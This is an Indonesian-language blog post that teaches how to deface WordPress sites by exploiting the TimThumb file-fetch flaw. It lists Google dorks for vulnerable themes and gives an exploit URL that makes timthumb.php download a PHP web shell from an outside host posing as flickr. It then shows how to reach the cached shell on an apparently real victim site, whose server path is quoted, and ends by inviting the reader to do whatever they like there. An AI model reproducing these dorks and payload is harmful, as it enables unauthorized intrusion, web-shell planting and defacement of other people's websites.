Deface Methode Tim-thumb Exploit WordPress

Deface Methode Tim-thumb Exploit WordPress

Hallo gan.... kali ini saya share tentang cara Deface Methode Tim-thumb Exploit WordPress
Oke kita mulai ya
jgn banyak bacot :v

Bahan
dork
kopi
rokok
Internetan :v
Exploit
?src=http://flickr.com.x-groups.org/M3PS.php

Dork :
inurl:/wp-content/themes/TheStyle/
inurl:/wp-content/themes/nool/
inurl:/wp-content/themes/PersonalPress/
inurl:/wp-content/themes/SimplePress/
inurl:/wp-content/themes/DeepFocus/
inurl:/wp-content/themes/DelicateNews/
inurl:/wp-content/themes/Bold/
inurl:/wp-content/themes/eStore/
inurl:/wp-content/themes/TheProfessional/
inurl:/wp-content/themes/OnTheGo/
inurl:/wp-content/themes/AskIt/
inurl:/wp-content/themes/Nova/
inurl:/wp-content/themes/eNews/
inurl:/timthumb.php? site:.
inurl:/admin/timthumb.php? site:.

1. Pertama Kamu ngedork dulu di om google :)


2. Cari Target nya.... gw uda pnya live target hehe :v


3. Tambahin di blkng nya http://site.com/timthumb.php
mencari vuln atau ga :v  contoh nya yang di bawah ya 

3. sekarang masukan exploitnya contoh nya http://site.com/timthumb.php?src=http://flickr.com.x-groups.org/M3PS.php ada exploitnya diatas 
dan ada tulisan 
Unable to open image : /home/truongdua/domains/truongduahotel.com/public_html/cache/external_461550a752f07cfaf990acce7236424c.php
Query String : src=http://flickr.com.x-groups.org/M3PS.php
TimThumb version : 1.30
Berarti sitenya bisa di upload shell 

4.sekarang copykan di belakang site misalnya https://site.com//cache/external_461550a752f07cfaf990acce7236424c.php

zeeb muncul shell kamu :) 

5. Terserah lu mau ngapain di situ
 


Sekian dan Terima kasih
semoga bermanfaat :) 




Share This :